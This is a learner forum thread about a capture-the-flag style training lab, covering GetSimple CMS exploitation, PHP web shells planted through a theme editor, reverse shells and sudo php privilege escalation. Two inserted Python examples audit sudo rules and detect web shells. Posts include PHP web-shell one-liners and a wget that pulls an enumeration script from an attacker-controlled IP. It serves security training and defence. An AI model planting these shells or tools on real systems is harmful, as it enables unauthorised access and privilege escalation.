Getting started | Knowledge Check

Hello. I'm stuck on the final stage of the module "Getting started" on Academy. I solved the first exercise, opening user.txt, with metasploitable + the GetSimple RCE exploit. But the next task is getting the root.txt file, and I need to run LinPEAS.sh to find any ways to escalate privileges.

So I can't figure out how to do it. The next step recommended in the tutorial is the "Python3 pty trick to upgrade to a pseudo TTY", but I can't run it through meterpreter or sh on the local target machine.

Another vector is that "sudo -l" on the target says that all users may run /usr/bin/php. I wrote a shell with "<?PHP system(\$_GET['cmd']);?>", uploaded it to the target and curled it, but nothing happened.

Comments

  • So now I'm able to spawn a bash reverse shell and run linpeas. But it shows nothing interesting besides php NOPASSWD, which I already knew from 'sudo -l'.
    Keep searching

  • Hey guys, I am so stuck. The website is so slow and the upload button is not working. I have tried to upload it with metasploit but it didn't work either. And now I don't know how I can get this. Can anyone help? :) Please

  • Same problem as Enzo. Does anyone have the same problems? I literally can't upload with the button or meta (I think it is a server problem, it takes up to 3 minutes to get a simple page).
    Can someone from the staff please help?

  • any news guys? still unable to complete this module

  • If anyone needs a bit of a nudge, feel free to hit me up on the Discord.

  • The site uses Flash Player, plus it is so so so slow. I mean, I know what to do, but the site itself is stressing. Who was able to bypass that?

  • Same problem as reported above, I cannot access the upload button... it's not reacting to my clicks. I have tried 3 browsers.

  • This problem still exists. I'm on this part today and feel confident in what I'm going to do - loading the webpages just takes forever though, so it's really painful to do anything. The main page isn't too bad, but when you try to browse to any other directory it's really slow.

    Seeing lots of calls to ajax.googleapis.com taking a while, and then it tries to contact 172.16.27.5 and also takes a long time.

    Not sure if that helps anyone troubleshoot the target image, hopefully it's resolved soon though.

  • You can message me for a hint if you're still stuck

  • Go back and REALLY pay attention to types of shells.....I mean until your eyes bleed......I nearly cried when I realized
  • edited June 3

    Is there any other way to get in without using metasploit (because using metasploit was pretty simple in this one, I was able to capture the user flag without any hassle)? I was able to log in as admin and I was searching for possible vulns on the web, but I am not able to find any successful method (I tried editing the themes for a PHP reverse shell but there was no response). I am still trying to look for a potential way to exploit it without using Metasploit... If anyone has found something, we can discuss :smile:

  • Hey guys. I'm still working on this task (almost 1 week) and I have no idea how to escalate privileges. I use metasploit for it and have already improved the shell, but what's next? Could someone give me a little nudge?

  • I'm stuck on the priv esc portion as well, I'm sure that the /usr/bin/php binary plays a role in escalating privileges, I'm just not quite sure how to proceed
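
The sudo rule several posters mention (php runnable with NOPASSWD) is the kind of entry a configuration audit should flag. The following is an added example, not part of the original thread: it parses `sudo -l` output and reports rules that grant an interpreter or other code-execution capable program. The sample listing, the binary list and all names are constructed for illustration.

```python
import re

# Programs that can run arbitrary code or spawn a shell once started via sudo.
# Illustrative subset chosen for this example; extend it for your estate.
CODE_EXEC = {"php", "python", "perl", "ruby", "node", "lua", "bash", "sh",
             "vim", "vi", "find", "awk", "env", "less"}

# Constructed `sudo -l` output modelled on the rule described in the thread.
SAMPLE_SUDO_L = """\
Matching Defaults entries for www-data on target:
    env_reset, mail_badpass

User www-data may run the following commands on target:
    (ALL : ALL) NOPASSWD: /usr/bin/php
    (root) /usr/bin/systemctl restart apache2
    (root) NOPASSWD: /usr/bin/python3.8 /opt/report.py
"""

RULE = re.compile(
    r"^\s*\((?P<runas>[^)]*)\)\s*(?P<tags>(?:[A-Z_]+:\s*)*)(?P<cmds>\S.*)$")


def audit_sudo_listing(text):
    """Return one finding per rule that grants a code-execution capable binary."""
    findings = []
    for line in text.splitlines():
        m = RULE.match(line)
        if not m:
            continue
        runas = m.group("runas").split(":")[0].strip()
        nopasswd = "NOPASSWD:" in m.group("tags")
        for cmd in (c.strip() for c in m.group("cmds").split(",")):
            parts = cmd.split()
            if not parts:
                continue
            name = parts[0].rsplit("/", 1)[-1]
            base = re.sub(r"[\d.]+$", "", name)  # php7.4 -> php, python3.8 -> python
            if cmd != "ALL" and base not in CODE_EXEC:
                continue
            findings.append({
                "command": parts[0],
                "runas": runas,
                "nopasswd": nopasswd,
                # No pinned arguments: the caller chooses what the binary runs.
                "unrestricted_args": len(parts) == 1,
            })
    return findings


if __name__ == "__main__":
    for finding in audit_sudo_listing(SAMPLE_SUDO_L):
        print(finding)
```

A rule with `unrestricted_args` set is the one to remove or replace with a wrapper script that takes no caller-controlled input.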

  • @galertaw said:

    So now I'm able to spawn a bash reverse shell and run linpeas. But it shows nothing interesting besides php NOPASSWD, which I already knew from 'sudo -l'.
    Keep searching

    How were you able to transfer Linpeas, and how did your sudo -l work? I was not able to access any other commands like sudo and echo... but I was able to spawn a web shell using the ThemeEditor. It was working, but I still was not able to use other commands, only ls and cat and maybe some more of the defaults.

  • edited June 7

    OK, so here is one interesting thing I got... I was able to spawn a web shell using the following steps:
    1. I was able to log in as admin through the page.
    2. Then I started metasploit, and scanned and navigated the whole system for like 3-4 days.
    3. Then I started googling again and found out something about a GetSimple CMS 3.1.15 vulnerability that is in the theme editor.
    4. I visited the theme editor and tried to edit the PHP files there, and was able to spawn a webshell using the one-liner - <,?,p,h,p, e,c,h,o, s,h,e,l,l,_e,x,e,c,($_GET['e'].' 2>&1'); ?>
    (remove the commas; I had to use them or the forum was glitching)
    5. Then I tried the sudo -l command and it worked... (remember to URL-encode spaces to run commands)
    This is my progress until now...
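
A theme template edited in the way the post above describes leaves a recognisable trace on disk: request input passed straight into a command-execution function. The following is an added example, not part of the original thread: it scans a theme directory for that pattern. The function names, the sink list and the sample templates are constructed for illustration.

```python
import os
import re

# PHP calls that pass a string to the OS shell or evaluate it as code.
SINKS = r"\b(?i:system|shell_exec|exec|passthru|popen|proc_open|eval)\s*\("
# Request-controlled input.
SOURCES = r"\$_(?:GET|POST|REQUEST|COOKIE)\b"
# A sink whose arguments (up to the end of the statement) use request input.
SINK_WITH_INPUT = re.compile(SINKS + r"[^;]*?" + SOURCES)


def scan_source(text):
    """Return (line_number, matched_text) for each request-to-exec pattern."""
    hits = []
    for m in SINK_WITH_INPUT.finditer(text):
        line_no = text.count("\n", 0, m.start()) + 1
        hits.append((line_no, m.group(0)))
    return hits


def scan_tree(root):
    """Scan every .php file under root; return {relative_path: hits}."""
    flagged = {}
    for dirpath, _dirs, files in os.walk(root):
        for name in files:
            if not name.lower().endswith(".php"):
                continue
            path = os.path.join(dirpath, name)
            with open(path, encoding="utf-8", errors="replace") as fh:
                hits = scan_source(fh.read())
            if hits:
                flagged[os.path.relpath(path, root)] = hits
    return flagged


# Constructed theme files: an untouched template and one with an injected line.
CLEAN_TEMPLATE = "<?php get_header(); ?>\n<h1><?php get_page_title(); ?></h1>\n"
TAMPERED_TEMPLATE = CLEAN_TEMPLATE + "<?php system($_GET['cmd']); ?>\n"

if __name__ == "__main__":
    print(scan_source(CLEAN_TEMPLATE))
    print(scan_source(TAMPERED_TEMPLATE))
```

A pattern match like this misses obfuscated code, so it works best alongside file-integrity monitoring of the theme directory and a review of who can reach the theme editor.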

  • @SPARTANone17 said:

    OK, so here is one interesting thing I got... I was able to spawn a web shell using the following steps:
    1. I was able to log in as admin through the page.
    2. Then I started metasploit, and scanned and navigated the whole system for like 3-4 days.
    3. Then I started googling again and found out something about a GetSimple CMS 3.1.15 vulnerability that is in the theme editor.
    4. I visited the theme editor and tried to edit the PHP files there, and was able to spawn a webshell using the one-liner - <,?,p,h,p, e,c,h,o, s,h,e,l,l,_e,x,e,c,($_GET['e'].' 2>&1'); ?>
    (remove the commas; I had to use them or the forum was glitching)
    5. Then I tried the sudo -l command and it worked... (remember to URL-encode spaces to run commands)
    This is my progress until now...

    Thanks, following your steps led me to the initial shell. From here though, I had to get a true reverse shell to exploit a certain binary that sudo can run on. GTFOBins led the way for me afterwards!

  • Finally!!! Jesus... you have to be fast, otherwise the machine just dies

  • edited June 8

    @dewest91 said:

    Thanks, following your steps led me to the initial shell. From here though, I had to get a true reverse shell to exploit a certain binary that sudo can run on. GTFOBins led the way for me afterwards!

    How were you able to get a true REVERSE SHELL!!!!!!!!!! I tried like 50 times till now and still I am not able to spawn a true shell. I know that afterwards I have to exploit the php vulnerability using gtfobins, but how? Please help...

  • @SPARTANone17 said:

    How were you able to get a true REVERSE SHELL!!!!!!!!!! I tried like 50 times till now and still I am not able to spawn a true shell. I know that afterwards I have to exploit the php vulnerability using gtfobins, but how? Please help...

    I uploaded a PHP web shell on the theme editor page, then set up a listener on my local machine, and used a PHP reverse shell one-liner.

  • edited June 13

    @dewest91 said:

    I uploaded a PHP web shell on the theme editor page, then set up a listener on my local machine, and used a PHP reverse shell one-liner.

    But were you able to navigate out of the current working directory? Because last time I tried, I wasn't able to navigate out of the current working directory. And that's not it: how were you able to use the PHP webshell and listen on your device? How were you able to use a listener with a PHP webshell, because a webshell can be accessed by using the web browser or cURL.
    But I am gonna try it now and explore myself. I will read your answer after I complete the module :smiley:

  • edited June 13

    @SPARTANone17 said:

    But were you able to navigate out of the current working directory? Because last time I tried, I wasn't able to navigate out of the current working directory.

    OK, I was able to get the root flag as well... Thanks for the help @dewest91 :smile:

  • I wonder if anyone is able to offer a helping hand, as I'm unsure how to progress. I have managed to gain a foothold by using the GetSimple msf exploit and have submitted the user flag; however, when trying to upload LinEnum I get the 200 OK response but then followed by permission denied?

    I'm sure I'm doing something wrong (as this is the case most times) but I'm just wondering if I am missing something stupidly obvious?

    Just to be clear: I download LinEnum.sh onto the target machine by using wget http://10.10.16.95:8080/LinEnum.sh and then receive the following -

    '--2021-06-28 09:56:14-- http://10.10.16.95:8080/LinEnum.sh
    Connecting to 10.10.16.95:8080... connected.
    HTTP request sent, awaiting response... 200 OK
    Length: 46631 (46K) [text/x-sh]
    LinEnum.sh: Permission denied

    Cannot write to ‘LinEnum.sh’ (Permission denied).'
